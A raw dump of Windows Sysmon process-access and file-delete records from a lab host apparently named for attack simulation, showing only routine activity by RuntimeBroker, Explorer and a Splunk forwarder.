51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006562Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006561Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006560Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006559Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 23542300x80000000000000006558Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.371{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9818ACFE98BE7263DA7C108FE10D8547,SHA256=4D8D9EC6D357351F2DE5DD4D5BB79AD80F03885F81B9075A20B329CECC32B3DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000006557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.371{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1792867CBC372E2CA257814D99F9445F,SHA256=23E089A3AD73F3F52E1BAD194D10B95EAABAF6F3ED7B4CEEDD862E1A1B90D6C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006555Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006554Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006553Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.215{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x80000000000000006542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.200{266CAFBE-64C4-6064-9B00-00000000AE01}49245952C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 